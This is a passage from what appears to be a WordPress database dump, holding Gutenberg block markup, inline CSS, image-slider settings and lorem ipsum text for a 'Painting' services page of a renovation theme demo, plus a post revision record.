Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"113548b0-1e44-47c8-bc43-c0fedfe92d7d\"} -->\n<style type=\"text/css\"> .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-113548b0-1e44-47c8-bc43-c0fedfe92d7d skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"a9418e2c-7f57-47f3-9fcc-613b1b98f206\"} -->\n<style type=\"text/css\"> .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a9418e2c-7f57-47f3-9fcc-613b1b98f206\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"73265421-0369-4bd1-b7b6-c735abbd079f\"} -->\n<style type=\"text/css\"> .block-id-73265421-0369-4bd1-b7b6-c735abbd079f .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-73265421-0369-4bd1-b7b6-c735abbd079f .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-73265421-0369-4bd1-b7b6-c735abbd079f .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-73265421-0369-4bd1-b7b6-c735abbd079f is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2c833901-b842-458d-bd55-f82c22e5338c\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2c833901-b842-458d-bd55-f82c22e5338c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"f904279a-445a-493e-8118-6d165bf27627\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-f904279a-445a-493e-8118-6d165bf27627 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f904279a-445a-493e-8118-6d165bf27627 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f904279a-445a-493e-8118-6d165bf27627 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f904279a-445a-493e-8118-6d165bf27627 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f904279a-445a-493e-8118-6d165bf27627.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a612b575-0cdf-45d6-a8be-65f31b8e3d6a\"} -->\n<style type=\"text/css\"> .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"08e567b7-b230-4874-9818-b15e782b9bb4\"} -->\n<style type=\"text/css\"> .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-08e567b7-b230-4874-9818-b15e782b9bb4\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"319aecdb-6790-41eb-9254-6173f7a75e2f\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-319aecdb-6790-41eb-9254-6173f7a75e2f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Painting','','inherit','closed','closed','','229-revision-v1','','','2021-05-27 10:53:22','2021-05-27 10:53:22','',229,'https://cteisys.com/?p=345',0,'revision','',0),(263,1,'2021-05-28 05:44:11','2021-05-28 05:44:11','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"9442ca66-a156-4eca-bc76-a1ce7a02d56a\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-9442ca66-a156-4eca-bc76-a1ce7a02d56a background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d8f9dcbd-15b0-408f-ac6e-562c2306ed02\"} -->\n<style type=\"text/css\"> .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" 